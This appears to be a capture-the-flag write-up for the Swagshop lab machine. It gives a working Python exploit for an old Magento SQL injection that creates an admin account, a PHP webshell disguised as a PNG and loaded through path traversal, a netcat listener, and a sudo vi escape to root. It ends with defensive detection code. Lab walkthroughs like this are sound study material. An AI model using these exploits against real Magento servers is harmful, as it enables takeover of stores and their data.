Swagshop

Posted on February 23, 2020



Port scan with nmap:

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.140 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.10.10.140


Port 80 serves a 2014 Magento installation.


Google: magento 2014 exploit


# Python 2 script: print statements and base64.b64encode() called on a str
import requests
import base64
import sys

target = "http://10.10.10.140/index.php"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO admin_user (firstname, lastname,email,username,password,created,lognum,reload_acl_flag,is_active,extra,rp_token,rp_token_created_at) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO admin_role (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""

query = q.replace("\n", "").format(username="forme", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decodes to {{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url, 
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"

Run the script:


Log in with forme:forme


System -> Configuration


Advanced -> Developer


Template Settings -> Allow Symlinks -> Save Config


gedit shell.php.png


Catalog -> Manage Categories:


The file is uploaded to: http://10.10.10.140/media/catalog/category/shell.php.png


Newsletter -> Newsletter Templates:


Enter:

{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}


Listen on Kali:

nc -vlp 1337

Save and preview
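
As an added defensive example (not part of the original writeup), the following Python checks mirror the two attack steps above: a POST to the Cms_Wysiwyg directive endpoint whose base64 filter decodes to SQL against admin_user/admin_role, and a newsletter template that loads a core/template block through a '../' path. The sample request body and template are constructed here, and the function and constant names are my own.

```python
import base64
import re
from urllib.parse import parse_qs, urlencode

# Indicators taken from the two steps shown on this page (added example,
# not part of the original writeup; names below are my own).
DIRECTIVE_PATH = "/admin/Cms_Wysiwyg/directive/index/"
SQL_MARKERS = ("INSERT INTO ADMIN_USER", "INSERT INTO ADMIN_ROLE", "SET @PASS")
# core/template block whose template path climbs out of the theme directory
TRAVERSAL_BLOCK = re.compile(
    r"""\{\{\s*block\s+type=['"]core/template['"]\s+template=['"][^'"]*\.\./""",
    re.IGNORECASE)


def check_directive_request(path, body):
    """Return findings for a POST whose base64 'filter' carries stacked SQL
    against admin_user/admin_role, as the script above sends. [] means clean."""
    findings = []
    if DIRECTIVE_PATH not in path:
        return findings
    params = parse_qs(body)
    if "___directive" in params:
        findings.append("___directive sent to Cms_Wysiwyg endpoint")
    for raw in params.get("filter", []):
        try:  # re-pad, since a sender may strip the trailing '=' characters
            decoded = base64.b64decode(raw + "=" * (-len(raw) % 4)).decode("utf-8", "replace")
        except ValueError:
            continue
        if any(marker in decoded.upper() for marker in SQL_MARKERS):
            findings.append("filter decodes to SQL touching the admin tables")
    return findings


def template_has_traversal(text):
    """True when a newsletter/CMS template loads a core/template block from a
    '../' path, the symlink trick used above to reach media/."""
    return bool(TRAVERSAL_BLOCK.search(text))


# Constructed sample mirroring what the script above posts (not captured traffic).
SAMPLE_FILTER = base64.b64encode(
    b"popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);"
    b"SET @SALT = 'rp';INSERT INTO admin_user (username,password) VALUES ('x',@PASS);"
).decode()
SAMPLE_BODY = urlencode({"___directive": base64.b64encode(
    b"{{block type=Adminhtml/report_search_grid output=getCsvFile}}").decode(),
    "filter": SAMPLE_FILTER, "forwarded": 1})
SAMPLE_TEMPLATE = ("{{block type='core/template' "
                   "template='../../../../../../media/catalog/category/shell.php.png'}}")
```

Both checks work on a WAF-captured request body or on the saved template text; neither needs a live Magento instance.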


get www shell


Get a TTY shell with python3:

python3 -c 'import pty;pty.spawn("/bin/bash")'


ctrl+z
stty raw -echo


get user.txt


sudo -l


sudo /usr/bin/vi /var/www/html/index.php
:!/bin/bash


get root shell


get root.txt

